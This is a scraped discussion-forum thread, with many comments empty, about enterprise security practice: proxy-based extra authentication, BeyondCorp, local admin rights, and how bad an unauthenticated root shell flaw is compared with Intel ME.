- Additional authentication: Afraid of pre-auth exploits in a vendor's crappy application or whatever SQL injection in the login form some internal department concocted? Just have the proxy do an additional authentication step (e.g. negotiate/kerberos/AD auth), then unauthenticated users cannot harm you and authenticated evil users will be plainly visible in the logs.
- Fixing crap: Vendor changed the URL scheme of some webapp again? All the links from the internal wiki are broken now? Have the proxy do some regex-rewriting.
As for the various grandparents talking about whatever they did at FAANG: I don't believe it, because the above concept is (almost) the same as what e.g. Google is doing with https://cloud.google.com/beyondcorp
2021-08-18 03:51:31 +0000 UTC [ - ]
Ntrails 2021-08-18 07:00:49 +0000 UTC [ - ]
I managed to have local admin on my box by default for as long as I worked there and it was great.
Downloading and installing a new VS using my own msdn. Halycon days
nicoburns 2021-08-18 01:13:10 +0000 UTC [ - ]
_wldu 2021-08-18 01:16:41 +0000 UTC [ - ]
2021-08-18 04:33:21 +0000 UTC [ - ]
npteljes 2021-08-18 17:54:15 +0000 UTC [ - ]
ithinkso 2021-08-18 07:43:13 +0000 UTC [ - ]
passivate 2021-08-19 16:20:56 +0000 UTC [ - ]
Its similar to popping up a fake authentication screen and asking the user to type their admin password.
nonameiguess 2021-08-18 00:56:07 +0000 UTC [ - ]
I can't even conceive of what a worse security hole would look like. This is unauthenticated root shell to anyone on the network. Maybe Intel Management Engine is worse since it grants privilege to run instructions and access hardware even the OS can't get to?
hermitdev 2021-08-18 02:45:23 +0000 UTC [ - ]
anyfoo 2021-08-18 03:08:13 +0000 UTC [ - ]
hermitdev 2021-08-18 03:52:49 +0000 UTC [ - ]
anyfoo 2021-08-18 02:07:03 +0000 UTC [ - ]
With newer stuff in certain configurations, something that gives you remote execution in the kernel or even lower (your Intel ME Engine example seems like a good one) is a much worse security hole, yeah (but then this one could still be a stepping stone to the worse bug).
T3OU-736 2021-08-18 03:08:41 +0000 UTC [ - ]
SGI's IRIX could be a part of a B2-level installation (because criteria was applicable to more than just the OS).
So much wheel reinvention sometimes...
[1] https://en.m.wikipedia.org/wiki/Trusted_Computer_System_Eval...
Y_Y 2021-08-18 06:55:34 +0000 UTC [ - ]
anyfoo 2021-08-18 03:16:41 +0000 UTC [ - ]
I share the sentiment with the wheel reinvention, though. This will continue happening...
c3534l 2021-08-18 03:48:54 +0000 UTC [ - ]
SeriousM 2021-08-18 05:54:55 +0000 UTC [ - ]
MesSWK 2021-08-18 07:08:24 +0000 UTC [ - ]
[0] https://www.ic3.gov/Media/PDF/Y2013/PSA130918.pdf
2021-08-18 05:23:26 +0000 UTC [ - ]
ma2rten 2021-08-18 04:51:03 +0000 UTC [ - ]
q-rews 2021-08-18 07:21:36 +0000 UTC [ - ]
Thiez 2021-08-18 17:03:22 +0000 UTC [ - ]